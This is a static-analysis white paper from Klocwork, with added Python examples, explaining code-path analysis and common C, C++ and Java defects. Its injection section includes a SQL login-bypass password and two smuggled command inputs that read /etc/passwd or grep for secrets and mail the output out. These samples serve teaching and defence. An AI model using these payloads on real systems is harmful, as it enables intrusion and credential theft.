When, Why and How to Leverage Source Code Analysis Tools
Finding critical bugs in C, C++ and Java code
Automated source code analysis is technology aimed at locating and describing areas of weakness in source code. Those weaknesses might be security vulnerabilities, logic errors, implementation defects, concurrency violations, rare boundary conditions, or many other types of problem-causing code. The name of the associated research field is static analysis. This is differentiated from more traditional dynamic analysis techniques such as unit or penetration testing by the fact that the work is performed at build time using only the source code of the program or module in question. The results reported are therefore generated from a complete view of every possible execution path, rather than some aspect of a necessarily limited observed runtime behavior. (In practice an analyzer models those paths approximately, so its reports still need triage; the examples later in this paper show the reasoning behind each kind of report.)
Perhaps the most obvious question confronting any new developer-facing technology is: why?
»» Why should developers use a new tool when they already have so many to choose from?
»» What makes this technology compelling enough to make me want to add it to my already bloated build chain?
»» And what does it do, anyway?
This paper will answer these questions, and more. But for the moment just consider the fact that at time of writing, 80% of the Fortune 500 have already deployed, or are currently engaged in deploying, some kind of automated source code analysis. The reasons for doing so can be stated in as many ways as there are people answering the question, but the basic principle can be found in all of these deployments:
»» Tell me what's wrong with my code before I ship it – don't let me be the guy responsible for shipping a killer vulnerability or bug into the wild.
There are other compelling reasons, such as:
»» Make my existing processes for code review more effective through automation
»» Enhance my existing QA resource with 100% coverage of all boundary conditions
»» Help me protect my brand as we go to market with new products
But the bottom line remains the capability of this technology to afford developers the ability to scrub their code of obvious and not-so-obvious weaknesses as they work, before they submit their code for check-in and more formal down-stream validation procedures.
Gwyn Fisher, CTO | White Paper | October 2007
www.klocwork.com
Introduction to the Technology
The process of automated source code analysis involves building a rich representation or model of the provided code (akin to a compilation phase), and then simulating all possible execution paths through that model, mapping out the flow of logic on those paths coupled with how and where data objects are created, used and destroyed.
Once the projection of code paths and the mapping of data objects are available, we can look for anomalous conditions that either will or might potentially cause exploitable vulnerabilities, execution failure, or data corruption at runtime.
There are two major families of checking capability typical to this type of analysis: abstract syntax tree (AST) validation and code path analysis. The former case is most frequently applied to validation of the basic syntax and structure of code, whereas the latter is used for more complete types of analysis that depend on understanding the state of a program's data objects at any particular point on a code execution path.
Abstract Syntax Trees
An abstract syntax tree, or AST for short, is simply a tree-structured representation of the source code as might be typically generated by the preliminary parsing stages of a compiler. This tree contains a rich breakdown of the structure of the code in a non-ambiguous manner, allowing for simple searches to be performed for anomalous syntax.
Consider the example of an organization wishing to enforce a set of corporate coding standards. Stated in the standard is the basic requirement for the use of a compound statement block rather than single statements as the body of a loop (e.g. a for-loop). In this case, an AST check is what would be appropriate:

INCORRECT:

    for( i = 0; i < 10; i++ ) doSomething();

CORRECT:

    for( i = 0; i < 10; i++ ) { doSomething(); }

In this example, the (simplified, for clarity) AST for the incorrect case would conceptually appear as follows:

    For-loop
        Statement
            doSomething()

In contrast to which, the AST for the correct case would conceptually appear as follows:

    For-loop
        Statement block
            Statement
                doSomething()

As you can imagine, constructing checkers that look for this type of standards violation is quite straightforward and depends solely on the syntax of the code itself and not on the runtime behavior, or state, of that code. Essentially, the checker would be instructed to find all instances of "For-loop" nodes that contain a "Statement" node as an immediate descendant, and to flag them as violations.
Similarly, AST checkers can easily be constructed to enforce standards around naming conventions, function call restrictions (e.g. unsafe library checks), etc. Anything that can be inferred from the code without requiring knowledge of that code's runtime behavior is typically a target for AST checking.
Given the simple nature of what AST checkers can actually do, there are many tools that offer this type of checking for various different languages, some of which are freely available from the open source community, for example PMD for Java. Several of these tools use XPath, or an XPath-derived grammar, to define the conditions that the checkers look for, and customers should consider adopting solutions that provide extensibility mechanisms for creating AST checkers. This type of checking is relatively simple to do, and constructing new checkers of this type for corporate coding standards or industry recommended best practice is a common endeavor.
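Two AST checkers of the kind the preceding paragraphs describe, written against Python's `ast` module as an added example (this is not the paper's code, nor PMD's XPath rules). Python's grammar already forces a block as a loop body, so the for-loop rule above has no Python equivalent; the two rules implemented here are the other two the text names, an "unsafe library call" restriction and a naming convention. The rule names, the banned-call list and the sample source are this example's own assumptions. Note that neither rule needs anything beyond the tree: no data flow, no knowledge of runtime state.

```python
"""Two AST-level checkers (added example): a banned-call rule and a naming
rule. The rule names, BANNED list and SAMPLE source are assumptions of this
example, not Klocwork's or PMD's."""
import ast
import re

BANNED = {"eval", "exec", "os.system", "pickle.loads"}   # assumed project policy
SNAKE = re.compile(r"^[a-z_][a-z0-9_]*$")               # assumed naming convention


def _dotted(node):
    """Reconstruct 'a.b.c' for a Name/Attribute chain, else None."""
    if isinstance(node, ast.Name):
        return node.id
    if isinstance(node, ast.Attribute):
        base = _dotted(node.value)
        return f"{base}.{node.attr}" if base else None
    return None


class StyleChecker(ast.NodeVisitor):
    def __init__(self):
        self.findings = []          # (line, rule, detail)

    def visit_Call(self, node):
        name = _dotted(node.func)
        if name in BANNED:
            self.findings.append((node.lineno, "BANNED_CALL", name))
        self.generic_visit(node)    # keep walking: arguments may contain calls too

    def visit_FunctionDef(self, node):
        if not SNAKE.match(node.name):
            self.findings.append((node.lineno, "NAMING", node.name))
        self.generic_visit(node)


def check_source(src):
    """Parse src and return its findings sorted by line number."""
    checker = StyleChecker()
    checker.visit(ast.parse(src))
    return sorted(checker.findings)


# Constructed sample input (not taken from the paper).
SAMPLE = """\
import os

def runListing(name):
    os.system("ls " + name)      # shells out with caller-supplied data

def run_listing(name):
    print(eval(name))

def fine(x):
    return len(x)
"""

if __name__ == "__main__":
    for line, rule, detail in check_source(SAMPLE):
        print(f"line {line}: {rule}: {detail}")
```

On the sample this reports the camel-case function on line 3 and the two banned calls on lines 4 and 7; `eval` is found even though it sits inside the argument list of `print`, because the visitor keeps descending after each call node.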
Code Path Analysis
Consider now a more complex example. This time instead of looking for style violations, we wish to check whether an attempted dereference of a pointer should be expected to succeed or fail:

    if( x & 1 ) ptr = NULL;
    *ptr = 1;

In this case it is obvious from manual inspection that the variable "ptr" can assume a NULL value whenever the variable "x" is odd, and that this condition will cause an unavoidable zero-page dereference.
Attempting to find a bug of this type using AST scanning, however, is seriously non-trivial. Consider the (simplified, for clarity) AST that would be created from that snippet of code:

    Statement block
        If-statement
            Check-expression
                Binary-operator &
                    x
                    1
            True-branch
                Expression-statement
                    Assignment-operator =
                        ptr
                        0
        Expression-statement
            Assignment-operator =
                Dereference-pointer
                    ptr
                1

In this case, there is no obvious tree search or simple node enumeration that could cover the attempted, and at least occasionally illegal, dereferencing of "ptr" in anything like a reasonably generalized form. So for cases such as this, it is necessary to take a step beyond simply searching for patterns of syntax, and to analyze the lifecycle of data objects as they appear and are used within a control path's flow of execution.
Code path analysis tracks objects within a code execution path and allows checkers to validate the legality or cleanliness of the data as it gets used. In the example above, the AST that is built for simple types of style and syntax checks is rewritten in a form that allows an answer to be generated for the following question:
»» Is there a valid, reachable code path on which the assignment of NULL is followed by an attempted dereference without an intermediate check?
Consider the following example of control flow and data object usage:

    void f(int x, int y)
    {
        int value, *p, *q;
        p = (x & 1) ? NULL : &value;
        if( p ) *p = 1;
        q = p;
        if( y & 1 ) *q = 1;
    }

In this instance we will unavoidably crash whenever both 'x' and 'y' are odd. Finding this situation requires a rich representation that reflects the start, or trigger, of a given code path, any propagation or aliasing that occurs during the execution of that code path, and the end, or sink, of the code path.
In our example, the trigger for the code path that interests us is the assignment of a NULL value to a pointer:

    p = (x & 1) ? NULL : &value;

Once this assignment is made, we can reasonably begin looking along the ensuing reachable code paths to check for propagation and/or illegal sink conditions. In our example, the first potential sink occurs using the variable 'p':

    if( p ) *p = 1;

As the value of the pointer is checked for legality, however, this isn't an illegal sink condition and so can be ignored. Next, we have propagation:

    q = p;

From this point forwards in the reachable code path set, references to 'q' are as valid as references to 'p', as they are now aliases of each other (until otherwise assigned). Knowing this, the system can again validate a potential sink:

    if( y & 1 ) *q = 1;

In this case, it is entirely possible to follow a legal code path all the way from the assignment of NULL through to the use of that NULL in a crash-causing context, and so a path analysis defect will be reported.
Obviously this is only one type of the many different questions that can be answered using this type of analysis, such as:
»» Is this newly created object released before all aliases to it are removed from scope?
»» Is this data object ever range-checked before being passed to an OS function?
»» Is this string ever checked for special characters before being submitted as a SQL query?
»» Will this copy operation result in a buffer overflow?
»» Is it safe to call this function at this time?
By following code execution paths, either forward from a trigger event towards a target scenario, or backwards from a trigger event towards a required initialization, we can determine the answers to these questions and provide error reports when the target scenario or initialization either does or does not occur as expected.
This type of capability is required to do sophisticated analysis of source code and customers should look for tools that provide comprehensive code path analysis to enable the location of flaws such as memory leaks, invalid pointer dereferences, unsafe or tainted data propagation, concurrency violations, and many other types of problem-causing conditions as described in the next section.
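The trigger, propagation and sink walk just described, carried out by a toy path-sensitive checker. This is an added example in Python, not Klocwork's engine or the paper's code: the five-operation IR, the abstract state (each pointer maps to the set of values it may hold) and the path-forking walk are this example's own assumptions. `F_XY` is the paper's `f(x, y)` transcribed into that IR.

```python
"""Toy path-sensitive NULL-dereference checker (added example).

The IR, the abstract state and the walk are assumptions of this example, not
Klocwork's representation. A statement is a tuple:
  ("maybe_null", v)        v = cond ? NULL : &value   trigger: v may be NULL
  ("alias", dst, src)      dst = src                  propagation
  ("if_nonnull", v, body)  if (v) { body }            check: v is valid inside body
  ("if", cond, body)       if (cond) { body }         cond says nothing about pointers
  ("deref", v, label)      *v = ...                   sink
"""

NULL, VALID = "NULL", "valid"


def _explore(stmts, state, findings, trace):
    """Walk stmts from an abstract state, forking at every branch so that each
    feasible path is followed to its end. Records (label, var, trace) for every
    dereference that a NULL value can reach."""
    state = dict(state)           # private copy: sibling paths must not see our updates
    for i, s in enumerate(stmts):
        rest = stmts[i + 1:]
        op = s[0]
        if op == "maybe_null":
            state[s[1]] = {NULL, VALID}
        elif op == "alias":
            state[s[1]] = set(state.get(s[2], {VALID}))
        elif op == "deref":
            if NULL in state.get(s[1], {VALID}):
                findings.add((s[2], s[1], trace))
        elif op == "if_nonnull":
            v, body = s[1], s[2]
            may = state.get(v, {VALID})
            if VALID in may:      # path on which the check passes: v valid in body and after
                _explore(body + rest, dict(state, **{v: {VALID}}),
                         findings, trace + (f"{v} != NULL",))
            if NULL in may:       # path on which the check fails: body skipped, v is NULL
                _explore(rest, dict(state, **{v: {NULL}}),
                         findings, trace + (f"{v} == NULL",))
            return                # both continuations were handled recursively
        elif op == "if":
            cond, body = s[1], s[2]
            _explore(body + rest, state, findings, trace + (cond,))
            _explore(rest, state, findings, trace + (f"!({cond})",))
            return
        else:
            raise ValueError(f"unknown op {op!r}")


def check(program):
    """Return the sorted list of (sink label, pointer, path) findings."""
    findings = set()
    _explore(program, {}, findings, ())
    return sorted(findings)


# The paper's f(x, y) in the IR. A pointer that has not been assigned is
# treated as valid, so the uninitialised p and q raise no report by themselves.
F_XY = [
    ("maybe_null", "p"),                               # p = (x & 1) ? NULL : &value;
    ("if_nonnull", "p", [("deref", "p", "*p = 1")]),   # if( p ) *p = 1;
    ("alias", "q", "p"),                               # q = p;
    ("if", "y & 1", [("deref", "q", "*q = 1")]),       # if( y & 1 ) *q = 1;
]

if __name__ == "__main__":
    for label, var, trace in check(F_XY):
        print(f"NULL dereference of {var} at '{label}' on path: {' && '.join(trace)}")
```

Run on `F_XY` the checker reports exactly one defect, `*q = 1` reached with `p == NULL && y & 1`, and stays silent on `*p = 1` because the guard narrows `p` on the only path that reaches it. Two limits of the toy are worth knowing when reading real reports: following every path separately is exponential in the number of branches (production analyzers merge states at join points), and the state here is per name, so a check on `p` does not narrow its alias `q`; an industrial tool tracks the object the names share.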
What Type of Issues Can Be Found?
In this section, we will walk through a number of examples of problems that can be identified using modern static analysis tools, showing how they occur and what can happen if they are not remedied before shipment. Whilst many more types of weakness can be found using Klocwork's tools, these examples should give the reader a firm grounding in what a good static analysis suite can do, regardless of the vendor.
Note that the examples given here are shown in a variety of C/C++ and Java. Where appropriate, the relevant capabilities within the product are available in all supported languages, however.
Security vulnerabilities
Traditionally of interest to developers working on consumer-facing applications, security is becoming more and more critical to developers in all types of environments, even those that have until recently considered security to be a non-issue. Some of the more important areas of security that can be found with source code analysis are:
»» Denial of service
»» SQL injection
»» Buffer overflow
»» Cross-site scripting (XSS)
»» Process/file injection
Denial of service
As could be guessed from the name, this type of vulnerability reflects a desire on the part of an attacker to deny access to a service offered by one or more processes under attack. This can be caused many different ways, from actually crashing the process, to choking the service with an inordinate number of requests, to resource constraining the service to the point of it becoming useless, etc. Attack vectors that are exposed to such approaches can often be spotted in code that is not created to be defensive, but rather makes naïve assumptions about the operating environment within which it will be running.
Consider the following example:

    public void f(String name, Properties props) throws IOException
    {
        InputStream is;
        is = getClass().getClassLoader().getResourceAsStream(name);
        if( is != null ) {
            props.load(is);
        }
    }

This simple function can easily cause a resource constraint within a server that will eventually lead to a DoS condition. Every time this function is called a new input stream is opened on the named resource and never closed (Properties.load does not close the stream it is given), so the handle behind it is held until the garbage collector happens to finalize it, if ever. Call this function within the main request handler of a service and it won't take long for the service to crawl to a halt.
Likewise, creating resources using data that has not been validated (such data is said to be tainted, and its flow into the resource is taint propagation) can quickly choke a service:

    public void doGet(HttpServletRequest req, HttpServletResponse res)
    {
        String val = req.getParameter("size");
        Map props = new HashMap(Integer.parseInt(val));
        …
    }
Here the tainted data, as retrieved from an incoming HTTP parameter, is passed without validation into the constructor for a Collection object, an operation that can easily be attacked to cause the service to shut down: a huge value forces an allocation the heap cannot satisfy, and a non-numeric one aborts the request with a NumberFormatException.
Note that while this example uses a Java web servlet request for demonstration purposes, many DoS attack vectors exist within process boundary conditions that are normally entirely within the control of the developer writing the application. This tends to lead to assumptions being made about the data that will be marshaled across that boundary, allowing an attacker to disrupt service simply by placing unexpected ranges of data on what is supposed to be a clean wire, as shown in this example:

    void readDataFromWire(unsigned char* stream)
    {
        int bytes = (int)(*stream++);
        unsigned char* buffer = (unsigned char*)malloc(bytes);
        …
    }

Without checking the value of the 'bytes' variable, there is no way to guarantee that the subsequent allocation won't cause a failure, or potentially worse a significant constraint on available memory for other parts of the process, to occur. (As written, 'bytes' comes from a single unsigned byte and so is at most 255; the same pattern with a 16- or 32-bit length field, or with the length driving a loop of allocations, is where memory exhaustion becomes practical. A length of zero is also a hazard: malloc(0) may return NULL or a pointer that must not be dereferenced.)
SQL Injection
SQL-based attacks focus on sloppily-constructed queries that can result in the attacker being able to completely compromise the underlying database security model. Consider the following example of a login validation query:

    SELECT ID FROM USERS WHERE NAME='user' AND PWD='password';

Incoming parameters from the user are substituted into the expression and the query is executed. Consider a set of parameters provided by an attacker:

    NAME: x
    PWD:  x' OR '1' = '1

That bizarre-looking password, if not appropriately filtered by the application, results in the login validation query performing a retrieval of every ID in the system:

    SELECT ID FROM USERS WHERE NAME='x' AND PWD='x' OR '1' = '1';

If this is compounded by the login simply checking for success or failure of this statement (as opposed to counting result rows), the attacker is quickly granted whatever access rights might be available from whatever user records are processed by the application. In applications where the first row of the user table is reserved for the super-user, the application could easily be completely compromised.
There are many other forms of attack possible using applications that are not careful in their treatment of substitution strings within database statements. Luckily, a large percentage of the mistakes most commonly made in preparing such statements can be found by checking strings that are being provided to database functions for taint, or the lack thereof.

    public void query(HttpServletRequest req, Connection conn) throws Exception
    {
        Statement stmt = conn.createStatement();
        String val = req.getParameter("User");
        stmt.executeQuery("select * from users where user='" + val + "';");
    }
In this example, the tainted input value "val" was retrieved from the incoming request and substituted into a database statement without first having been scrubbed for characters outside of the alphanumeric range. Any such usage is subject to attack, and will cause warnings to be generated by the tool. Scrubbing is one remedy; the more robust fix is a prepared statement with bound parameters (java.sql.PreparedStatement), so that user data never becomes part of the statement text at all.
Buffer overflow
Buffers or arrays that are improperly handled can potentially lead to process corruption and even the execution of arbitrary code injected by an attacker. Consider the following example:

    void f(unsigned char* stream)
    {
        unsigned char buf[32];
        memcpy(buf, stream + 1, *stream);
        …
    }

In this trivial case, the author has made a fundamental assumption about the cleanliness of the incoming data, coupled with an architectural assumption about the range of that data. If this function is used in an environment open to attack, for example to process marshaled data from another process or server, or even from a file that is subject to injection on the user's system, the attacker could cause considerable stack corruption simply by exploiting the fact that the code will happily copy up to 255 bytes into a buffer able to hold only 32. A particularly accomplished attacker could use this exploit to inject carefully crafted code that effectively hijacks the process by inserting dummy stack content and overwriting one or more call frames.
A recent, high profile security breach in Microsoft Windows was caused by exactly this scenario. The "animated cursor vulnerability" as it was known (MS07-017, CVE-2007-0038) was caused by a section of code that effectively performed the following operations:

    HICON LoadAniIcon(…)
    {
        …
        ANIHEADER myAniHeader;
        memcpy(&myAniHeader, untrustedData->data, untrustedData->length);
        …
    }

Given sufficient time, motivation and resource, attackers were able to completely compromise target systems simply by encouraging users to load and use carefully crafted animated cursor files. Those cursor files contained structures guaranteed to cause this operation to overflow available space, to therefore corrupt the stack, and to place on the resulting stack a frame intended to transfer control to functions open to compromise.
Cross-site scripting (XSS)
One of the first restrictions placed on JavaScript in early browser versions was to build a wall around page content (what is now called the same-origin policy) so that scripts executing within a frame served by one site could not access content of frames served by another site. Cross-site scripting, therefore, is an attack pattern that focuses on enabling script from one site (the attacker's site) to access content from another site (e.g. the user's bank account site). In order to do this, the user must typically visit either a malicious or a naïve web site, obviously, although many experiments in social engineering have shown that users can be funneled towards even the most outlandish of sites quite readily.
In terms of physical manifestation, the most common form of XSS requires unfiltered HTML to be reflected back to the user from a server request. One common early attack vector was search engine results pages, which typically
reflected the user's query term in the title of the page. Without filtering, this reflected query term could easily contain HTML tags that were not correctly encoded and will therefore be interpreted as valid HTML by the receiving browser.
In essence, any reflection of unfiltered incoming data will trigger a warning from the tool, as the number and variety of exploits resulting from XSS grows every day. For example:

    public void doGet(HttpServletRequest req, HttpServletResponse res)
    {
        String title = req.getParameter("searchTerm");
        res.getOutputStream().write(title.getBytes("UTF-8"));
    }

Other manifestations of XSS revolve around the persistent storage of unfiltered user input that is later used to provide response content. This is a more difficult type of XSS to diagnose, as the attack pattern depends not only on a user's unfiltered input being stored, but on that stored tainted data being made available to every user from that point onwards. Naïve forum software packages were particularly susceptible to this attack pattern in the early days of the web, but in essence any application that stores incoming unfiltered web data in a database (or file) and then reflects that stored data back to the user at a later date is vulnerable to this persistent, or stored, form of XSS. Due to this attack pattern being so destructive if exploited, the tool triggers a warning whenever unfiltered data is retrieved from persistent storage and forwarded to the user.
Process or file injection
Of particular value to attackers, and therefore particularly to be avoided by authors, are attack vectors that allow the modification of system commands and/or system files. Performing process creation using tainted input, or creating files using tainted names or locations are the most prevalent mistakes made.
Consider the following:

    void doListing(char* name)
    {
        char command[256];
        if( strlen(name) < 250 ) {
            sprintf(command, "ls %s", name);
            system(command);
        }
    }

In this example the author has left themselves open to malicious attack by not scrubbing the incoming file name before appending it to an innocuous-looking command. Consider input that gets appended by this function without further processing to the "ls" command such as:

    -R / | grep secret | mail [email protected]

or

    /dev/null | cat /etc/passwd | awk -F: '{print $1}' | mail [email protected]

In general, any exit point to the underlying OS that uses either a command or file name must be validated for special characters prior to the call being placed. Failure to do so may well result in catastrophic results for the operating environment. Better still is to avoid the shell altogether: pass the file name as its own element of an argument vector to execvp() (with "--" ahead of it so that a name beginning with "-" cannot be read as an option), and the shell's metacharacters have no meaning to interpret.
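Hardened counterparts of the sinks shown in this section, collected in one file as an added example (this is not the paper's code; the table layout, function names, base directory and attacker strings are this example's own assumptions). It covers the bound-parameter query that replaces the concatenated SQL above, HTML encoding before the reflected search term is written out, an argument vector in place of the `ls` command line, path containment for the relative unpack directory discussed in the next example, and the length check the wire-reading and `memcpy` examples omit. The vulnerable concatenation is kept beside the fix so that the attacker's password from the SQL example can be run against both.

```python
"""Sink-side fixes for the injection examples (added example, not the paper's
code). Table layout, names, base directory and attacker strings are assumed."""
import html
import os
import sqlite3
import subprocess


def demo_db():
    """Constructed in-memory stand-in for the paper's USERS table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, user TEXT, pwd TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "admin", "s3cret"), (2, "alice", "hunter2")])
    return conn


def lookup_user_vulnerable(conn, user):
    """The paper's pattern, kept only for contrast: user data becomes SQL text."""
    sql = "SELECT id FROM users WHERE user = '" + user + "'"
    return [row[0] for row in conn.execute(sql)]


def lookup_user(conn, user):
    """SQL injection fix: the value is bound, so it is never parsed as SQL."""
    cur = conn.execute("SELECT id FROM users WHERE user = ?", (user,))
    return [row[0] for row in cur]


def reflect_title(term):
    """XSS fix: encode before reflecting, so '<', '>' and quotes become text."""
    return "<title>Results for " + html.escape(term, quote=True) + "</title>"


def listing_argv(name):
    """Command injection fix: one argv element per argument and no shell, so
    '|', ';' and '$()' are ordinary characters; '--' stops a name such as
    '-R /' from being read as an option."""
    if "\x00" in name:
        raise ValueError("embedded NUL in file name")
    return ["ls", "--", name]


def run_listing(name):
    """Runs the listing without /bin/sh (a list, not a string, is passed)."""
    return subprocess.run(listing_argv(name), capture_output=True, text=True).stdout


def confined_path(base, loc):
    """Path injection fix: resolve base/loc and insist the result stays under
    base. commonpath (not startswith) also rejects a sibling such as base+'2'."""
    base = os.path.realpath(base)
    target = os.path.realpath(os.path.join(base, loc))
    if os.path.commonpath([base, target]) != base:
        raise ValueError(f"{loc!r} escapes {base}")
    return target


def is_confined(base, loc):
    try:
        confined_path(base, loc)
        return True
    except ValueError:
        return False


def copy_record(stream, capacity):
    """Length-prefixed copy with the two checks the C examples omit: the
    declared length must fit both the remaining input and the destination."""
    if not stream:
        raise ValueError("empty stream")
    length, body = stream[0], stream[1:]
    if length > len(body):
        raise ValueError(f"length {length} exceeds remaining input {len(body)}")
    if length > capacity:
        raise ValueError(f"length {length} exceeds buffer capacity {capacity}")
    return bytes(body[:length])


if __name__ == "__main__":
    conn = demo_db()
    attacker = "x' OR '1' = '1"          # the paper's password payload
    print("concatenated:", lookup_user_vulnerable(conn, attacker))
    print("bound:       ", lookup_user(conn, attacker))
    print(reflect_title("<script>alert(1)</script>"))
    print(listing_argv("-R / | grep secret"))
    print(is_confined("/srv/unpacked", "../../etc/passwd"))
```

With the attacker's password the concatenated query returns every id in the table while the bound query returns none. Note that `os.path.join(base, loc)` discards `base` entirely when `loc` is absolute, which is exactly why the containment test is done on the resolved result rather than on the input string.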
Another example shows a file-specific attack vector:

    public void doPost(HttpServletRequest req, HttpServletResponse resp)
    {
        String loc = req.getParameter("name");
        unpackFilesTo(loc, req.getInputStream());
    }

    private void unpackFilesTo(String loc, InputStream data)
    {
        File dir = new File("./unpacked/", loc);
        …
    }

In this example, a potentially tainted string is used to construct a relative path name. Unfortunately for the author, the File constructor used here places no restriction on the use of "../" being a path element, thus leaving this application wide open to arbitrary file creation and/or overwrite. The usual defence is to canonicalise the combined path (File.getCanonicalPath()) and reject it unless it still lies beneath the canonical base directory.
Implementation defects
Regardless of the application being developed, implementation defects that escape into the wild have significant impact on the product being deployed. This could range from increased support costs to ongoing brand criticism to bottom line impact from inventory reversal. Releasing a quality product is everybody's goal, and static analysis tools can help significantly in bringing that product to market. Some of the more important areas of quality and ongoing maintenance are:
»» Memory management; leaks, using released memory, etc.
»» NULL pointer dereference/exception
»» Array bounds violations
»» Concurrency flaws and deadlocks
Memory management mistakes
Memory allocation and the correct releasing of that memory is a major source of defects, particularly in C and C++ code. Static analysis is well applied in this area, due to comprehensive coverage of code paths that can result in rare boundary conditions being signaled that might never be found using traditional runtime profiling tools.
Comprehensive static analysis tools should be able to track allocations and aliases of allocated memory to ensure that all allocations are released, that code paths do not attempt to make use of released memory, and that memory objects are not released twice.

    void f(…)
    {
        char* p = (char*)malloc(32);
        char* q = p;
        /* Use of unchecked allocation, might well be NULL */
        strcpy(p, "hello world");
        /* Release the memory by freeing an alias */
        free(q);
        /* Attempted use of already released memory */
        strcpy(p, "not good");
        /* Second release of the same block through the other alias: double free */
        free(p);
    }
NULL pointer dereference
Defects involving NULL pointers are as old as programming itself, and still as prevalent today as in any time before. We all understand what NULL pointers can do, and we all spend time looking for them and dealing with the after-effects of their being found in the wild. But consider the following example coding pattern that is fairly prevalent in even well-known and modern code bases:

    void f(char* ptr)
    {
        if( *ptr && ptr )      /* ptr is dereferenced before it is tested */
            …
    }

Or perhaps a Java example – just because there aren't pointers in the language doesn't mean you can't dereference a NULL object reference:

    public void f(String str)
    {
        if( str.length() == 0 || str == null )   // length() runs before the null test
            return;
        …
    }

Functions that return NULL under aberrant conditions, and whose returned values are later de-referenced, are particularly difficult to diagnose. If the static analyzer is able to consider every potential code path, however unlikely, even these rare boundary conditions are found and reported.
Array bounds violations
Accessing arrays out of bounds is an incredibly common mistake, even by senior developers. Consider the following example from code written by a vendor in support of their device under Linux (details obscured):

    int f()
    {
        struct devinfo* dev[8];
        int i;
        get_device_info(dev, 8);
        for( i = 0; dev[i] && (i < 8); i++ ) {    /* dev[i] is read before i is bounded */
            …
        }
    }

In many instances, perhaps the majority of the time, this code will run without hiccup. But whenever all eight entries are non-NULL the loop evaluates dev[8], one element past the end of the array, because the index is used before it is checked. A read past a stack array rarely faults outright; more often it picks up whatever lies beyond the array as a bogus pointer, which the loop body then dereferences, so the crash or silent corruption shows up somewhere else entirely.
Concurrency violations
With the trend towards more and more multi-core designs at the chip level, developers are increasingly being called upon to create threaded, or at least thread-aware, software. This places additional burden in terms of understanding how certain OS calls interact with locks that can cause threads to hang, and potentially to deadlock two or more threads in a process.
Only a handful of tools, such as the ones provided by Klocwork, are able to apply validations in the area of concurrency, such as ensuring that threads holding locks do not attempt to suspend or halt themselves, that locks are correctly released, and that lock holders do not attempt real-time pausing activities.
For example:

    pthread_mutex_t lock;

    void f()
    {
        pthread_mutex_lock(&lock);
        sleep(30);                  /* sleep() takes seconds: the lock is held for 30 s */
        pthread_mutex_unlock(&lock);
    }

In this pathological example, all threads requiring access to the "lock" mutex would be blocked for 30 s waiting for this segment to unlock.
Worse yet, the following example shows a never-released lock:

    void f()
    {
        pthread_mutex_lock(&lock);
        switch( op() ) {
            case 0:
                return;             /* early exit: the mutex is still held */
            default:
                break;
        }
        pthread_mutex_unlock(&lock);
    }

In the case where the function "op" returns zero, the calling thread will maintain the mutex on return. Assuming this lock is being used for task scheduling or other typical server activities, the obvious result is a hung system.
Another aspect of concurrency is concurrent modification of data objects. The following example shows a Java Collection operation that will be flagged as illegal:

    public void f(Collection coll)
    {
        for( Iterator it = coll.iterator(); it.hasNext(); ) {
            String el = (String)it.next();
            if( el.startsWith("/") )
                coll.remove(el);    // modifies coll behind its own iterator
        }
    }

In fact, this operation is illegal even in a single threaded environment as it violates a basic contract within the Collections framework: the fail-fast iterators of the standard collections throw ConcurrentModificationException on the next call to next() once the collection has been modified other than through the iterator itself (it.remove() is the legal way to drop the current element). In a multi-threaded environment the likelihood of this causing a data corrupting problem within the Collection itself is vastly increased.
Summary
As a developer considering using automated source code analysis, or a development manager considering providing such analysis tools for a group of coders, it should be obvious from the previous sections of this document what kind of problems can be found and how this might apply in day-to-day situations. In addition to what is described here, more types of problems can be found by Klocwork's tools, ranging from additional types of security or quality defects, to locating dead code, to incomplete or redundant header inclusion, to architectural coherence, to metrics violations, and many others.
One of the key aspects of any development tool is how it works for the developer, and by providing IDE integration with the most commonly used environments (Visual Studio, Eclipse, IDEA, Wind River Workbench, QNX Momentics, etc.) as well as robust command line tools for more traditional development environments, Klocwork is all about supporting developers in their native habitat.
Who wants to be the person on the hot seat when a critical vulnerability is exploited in the field, or when a coding mistake causes an inventory turnaround and costs your company serious money? Avoid that exposure by performing the most rigorous form of automated code review possible today, and do it on your desktop at the same time as you build your code.
Klocwork your source code and feel confident that you're checking in the most secure and defect-free code you've ever created.
About the Author
Gwyn Fisher is the CTO of Klocwork and is responsible for guiding the company's technical direction and strategy. With nearly 20 years of global technology experience, Gwyn brings a valuable combination of vision, experience, and direct insight into the developer perspective. With a background in formal grammars and computational linguistics, Gwyn has spent much of his career working in the search and natural language domains, holding senior executive positions with companies like Hummingbird, Fulcrum Technologies, PC DOCS and LumaPath. At Klocwork, Gwyn has returned to his original passion, compiler theory, and is leveraging his experience and knowledge of the developer mindset to move the practical domain of static analysis to the next level.
About Klocwork
Klocwork® offers a portfolio of software development productivity tools designed to ensure the security, quality and maintainability of complex code bases. Using proven static analysis technology, Klocwork's tools identify critical security vulnerabilities and quality defects, optimize peer code review, and help developers create more maintainable code. Klocwork's tools are an integral part of the development process for over 850 customers in the consumer electronics, mobile devices, medical technologies, telecom, military and aerospace sectors.
In the United States: 15 New England Executive Park, Burlington, MA 01803
In Canada: 30 Edgewater Street, Suite 114, Ottawa, ON K2L 1V8
t: 1.866.556.2967  f: 613.836.9088  www.klocwork.com
© Copyright Klocwork Inc. 2010 · All Rights Reserved